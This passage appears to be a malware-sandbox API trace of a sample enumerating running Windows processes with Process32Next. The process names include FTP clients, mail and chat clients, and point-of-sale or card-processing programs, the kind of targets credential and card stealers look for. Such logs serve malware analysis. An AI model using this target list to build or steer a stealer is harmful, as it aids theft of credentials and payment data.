hSnapshot=0x1a84, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x130, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0171.377] Process32Next (in: hSnapshot=0x1a84, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0171.379] Process32Next (in: hSnapshot=0x1a84, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0171.381] Process32Next (in: hSnapshot=0x1a84, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0171.382] Process32Next (in: hSnapshot=0x1a84, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x200, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0171.384] Process32Next (in: hSnapshot=0x1a84, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x218, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0171.385] Process32Next (in: hSnapshot=0x1a84, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x220, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0171.387] Process32Next (in: hSnapshot=0x1a84, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x278, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3c, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0171.390] Process32Next (in: hSnapshot=0x1a84, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0171.392] Process32Next (in: hSnapshot=0x1a84, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x32c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x200, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0171.394] Process32Next (in: hSnapshot=0x1a84, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x360, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0171.395] Process32Next (in: hSnapshot=0x1a84, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x37c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0171.397] Process32Next (in: hSnapshot=0x1a84, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x38c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0171.439] Process32Next (in: hSnapshot=0x1a84, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0171.440] Process32Next (in: hSnapshot=0x1a84, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0171.442] Process32Next (in: hSnapshot=0x1a84, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4a, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0171.446] Process32Next (in: hSnapshot=0x1a84, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x468, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0171.448] Process32Next (in: hSnapshot=0x1a84, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0171.450] Process32Next (in: hSnapshot=0x1a84, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x568, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0171.452] Process32Next (in: hSnapshot=0x1a84, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x640, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x30, th32ParentProcessID=0x620, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0171.455] Process32Next (in: hSnapshot=0x1a84, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x674, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0171.457] Process32Next (in: hSnapshot=0x1a84, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0171.459] Process32Next (in: hSnapshot=0x1a84, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0171.470] Process32Next (in: hSnapshot=0x1a84, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x558, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0171.472] Process32Next (in: hSnapshot=0x1a84, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x824, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x22, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="SkypeHost.exe")) returned 1 [0171.473] Process32Next (in: hSnapshot=0x1a84, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x884, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0171.475] Process32Next (in: hSnapshot=0x1a84, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x8f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0171.477] Process32Next (in: hSnapshot=0x1a84, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa74, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0171.479] Process32Next (in: hSnapshot=0x1a84, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0171.481] Process32Next (in: hSnapshot=0x1a84, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc6c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0171.575] Process32Next (in: hSnapshot=0x1a84, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 1 [0171.577] Process32Next (in: hSnapshot=0x1a84, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfdc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0171.579] Process32Next (in: hSnapshot=0x1a84, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0171.580] Process32Next (in: hSnapshot=0x1a84, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x470, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0171.582] Process32Next (in: hSnapshot=0x1a84, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbe0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0171.584] Process32Next (in: hSnapshot=0x1a84, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x878, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0171.585] Process32Next (in: hSnapshot=0x1a84, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0171.587] Process32Next (in: hSnapshot=0x1a84, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1038, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="this.exe")) returned 1 [0171.589] Process32Next (in: hSnapshot=0x1a84, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1040, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="love gas.exe")) returned 1 [0171.590] Process32Next (in: hSnapshot=0x1a84, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1048, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="against.exe")) returned 1 [0171.592] Process32Next (in: hSnapshot=0x1a84, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1064, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="borndegreereturn.exe")) returned 1 [0171.595] Process32Next (in: hSnapshot=0x1a84, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1070, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="national.exe")) returned 1 [0171.597] Process32Next (in: hSnapshot=0x1a84, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1078, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="our_beat.exe")) returned 1 [0171.599] Process32Next (in: hSnapshot=0x1a84, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1080, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="piece.exe")) returned 1 [0171.601] Process32Next (in: hSnapshot=0x1a84, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1088, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="lighttough.exe")) returned 1 [0171.603] Process32Next (in: hSnapshot=0x1a84, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1090, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="factorfree.exe")) returned 1 [0171.604] Process32Next (in: hSnapshot=0x1a84, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1098, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="standard.exe")) returned 1 [0171.606] Process32Next (in: hSnapshot=0x1a84, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="optionalso.exe")) returned 1 [0171.608] Process32Next (in: hSnapshot=0x1a84, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="speech-however-surface.exe")) returned 1 [0171.609] Process32Next (in: hSnapshot=0x1a84, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="hang around rise.exe")) returned 1 [0171.640] Process32Next (in: hSnapshot=0x1a84, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="kill.exe")) returned 1 [0171.642] Process32Next (in: hSnapshot=0x1a84, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="disease_victim_can.exe")) returned 1 [0171.643] Process32Next (in: hSnapshot=0x1a84, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="decideenergytend.exe")) returned 1 [0171.645] Process32Next (in: hSnapshot=0x1a84, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x110c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0171.647] Process32Next (in: hSnapshot=0x1a84, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1114, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0171.649] Process32Next (in: hSnapshot=0x1a84, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1120, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0171.652] Process32Next (in: hSnapshot=0x1a84, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1128, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0171.655] Process32Next (in: hSnapshot=0x1a84, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x113c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="bitkinex.exe")) returned 1 [0171.658] Process32Next (in: hSnapshot=0x1a84, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="coreftp.exe")) returned 1 [0171.661] Process32Next (in: hSnapshot=0x1a84, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1150, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="far.exe")) returned 1 [0171.663] Process32Next (in: hSnapshot=0x1a84, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1158, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="filezilla.exe")) returned 1 [0171.665] Process32Next (in: hSnapshot=0x1a84, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1168, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="flashfxp.exe")) returned 1 [0171.669] Process32Next (in: hSnapshot=0x1a84, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1170, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="fling.exe")) returned 1 [0171.672] Process32Next (in: hSnapshot=0x1a84, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="foxmailincmail.exe")) returned 1 [0171.679] Process32Next (in: hSnapshot=0x1a84, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="gmailnotifierpro.exe")) returned 1 [0171.685] Process32Next (in: hSnapshot=0x1a84, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1198, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="icq.exe")) returned 1 [0171.688] Process32Next (in: hSnapshot=0x1a84, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="leechftp.exe")) returned 1 [0171.690] Process32Next (in: hSnapshot=0x1a84, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="ncftp.exe")) returned 1 [0171.692] Process32Next (in: hSnapshot=0x1a84, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="notepad.exe")) returned 1 [0171.695] Process32Next (in: hSnapshot=0x1a84, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="operamail.exe")) returned 1 [0171.697] Process32Next (in: hSnapshot=0x1a84, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="pidgin.exe")) returned 1 [0171.699] Process32Next (in: hSnapshot=0x1a84, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="outlook.exe")) returned 1 [0171.702] Process32Next (in: hSnapshot=0x1a84, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="thunderbird.exe")) returned 1 [0171.704] Process32Next (in: hSnapshot=0x1a84, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="smartftp.exe")) returned 1 [0171.706] Process32Next (in: hSnapshot=0x1a84, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="skype.exe")) returned 1 [0171.708] Process32Next (in: hSnapshot=0x1a84, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1204, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="scriptftp.exe")) returned 1 [0171.710] Process32Next (in: hSnapshot=0x1a84, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x120c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="afr38.exe")) returned 1 [0171.712] Process32Next (in: hSnapshot=0x1a84, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="trillian.exe")) returned 1 [0171.715] Process32Next (in: hSnapshot=0x1a84, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x121c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="winscp.exe")) returned 1 [0171.717] Process32Next (in: hSnapshot=0x1a84, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1224, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="yahoomessenger.exe")) returned 1 [0171.721] Process32Next (in: hSnapshot=0x1a84, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="edcsvr.exe")) returned 1 [0171.724] Process32Next (in: hSnapshot=0x1a84, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1238, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="creditservice.exe")) returned 1 [0171.726] Process32Next (in: hSnapshot=0x1a84, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1240, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="ccv_server.exe")) returned 1 [0171.728] Process32Next (in: hSnapshot=0x1a84, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1248, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="aldelo.exe")) returned 1 [0171.730] Process32Next (in: hSnapshot=0x1a84, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1250, th32DefaultHeapID=0x0, 